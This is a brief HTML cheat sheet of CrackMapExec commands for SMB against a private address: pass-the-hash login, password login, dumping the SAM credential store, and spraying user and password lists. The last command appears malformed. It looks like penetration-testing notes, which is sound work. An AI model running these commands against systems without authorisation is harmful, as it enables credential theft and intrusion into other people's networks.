<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CrackMapExec</title>
</head><body><b><u>Check SMB With Password Hash</u></b><br/>
<br/>
crackmapexec smb 192.168.0.24 -u UserName -H 'hash'<br/>
<br/>
<b><u>Check SMB With Password</u></b><br/>
crackmapexec smb 192.168.0.24 -u UserName -p 'password'<br/>
<br/>
<b><u>Dump SAM</u></b><br/>
<br/>
crackmapexec smb 192.168.0.24 -u UserName -p 'password' --sam<br/>
<br/>
<b><u>Check CrackMapExec Against a list</u></b><br/>
<br/>
crackmapexec 192.168.0.24 -u &lt;user_list.txt -p '&lt;password_list.txt&gt;'<br/>
<br/>
</body></html>